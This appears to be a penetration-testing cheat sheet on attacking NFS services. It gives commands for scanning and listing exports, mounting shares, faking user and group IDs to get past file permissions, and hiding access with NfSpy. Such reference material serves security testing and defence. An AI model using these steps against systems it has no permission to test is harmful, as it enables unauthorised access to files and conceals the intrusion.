111 / 2049 - NFS


The Network File System (NFS) is a distributed file system protocol, built on Remote Procedure Call (RPC) and used to share folders and files between computers.

NFS is often used with Unix and Unix-like operating systems. For NFS before version 4, the user id and group id of the client system are sent in each RPC call, and the permissions these IDs have on the file being accessed are checked on the server.

Network scan and mount points enumeration

The following tools can be used to scan the network for NFS services and enumerate their exposed mount points:

nmap -v -p 111,2049 -sV --script=nfs-showmount.nse -oA nmap_nfs <RANGE | CIDR | HOSTNAME | IP>
msf> use auxiliary/scanner/nfs/nfsmount

showmount --exports <HOSTNAME | IP>

Mount shares

The Linux utility mount can be used to mount a NFS share:

mkdir /tmp/NFS_SHARE

mount -t nfs <HOSTNAME | IP>:<SHARE> /tmp/NFS_SHARE

# Confirm the mounted share
df -k | grep NFS_SHARE

If the following error message is being returned by the mount utility, the nfs-common package must be locally installed on the client system.

mount: /tmp/NFS_SHARE: bad option; for several filesystems (e.g. nfs, cifs) you might need a /sbin/mount.<type> helper program.

ID spoofing

For NFS before version 4, the server files access permissions are based on the client system current user id and group id. UID and GUID can thus be spoofed to access any directories and files exposed on the NFS export.

The server may use the root_squash mechanism that will make any requests using the UID or GID 0 (root) to be treated like the nobody user.

# Inside mounted folder
ls -lah
-> drwxr-xr--  3 <UID> <GID>  [...] dir_or_file

useradd -u <UID> tmp_user
su tmp_user

# OR
groupadd -r -g <GID> tmp_group
useradd -G tmp_group <USERNAME>

The NfSpy python script can be used to automate the process, with the advantage of hiding the access by immediately unmounting the share on the server but keeping the file handle:

nfspy -o server=<HOSTNAME | IP>:<SHARE>,hide,allow_other,ro,intr /tmp/NFS_SHARE

Connected users enumeration

The Linux utility showmount can be used to retrieve the active and currently mounted shares and theirs clients:

showmount --all <HOSTNAME | IP>

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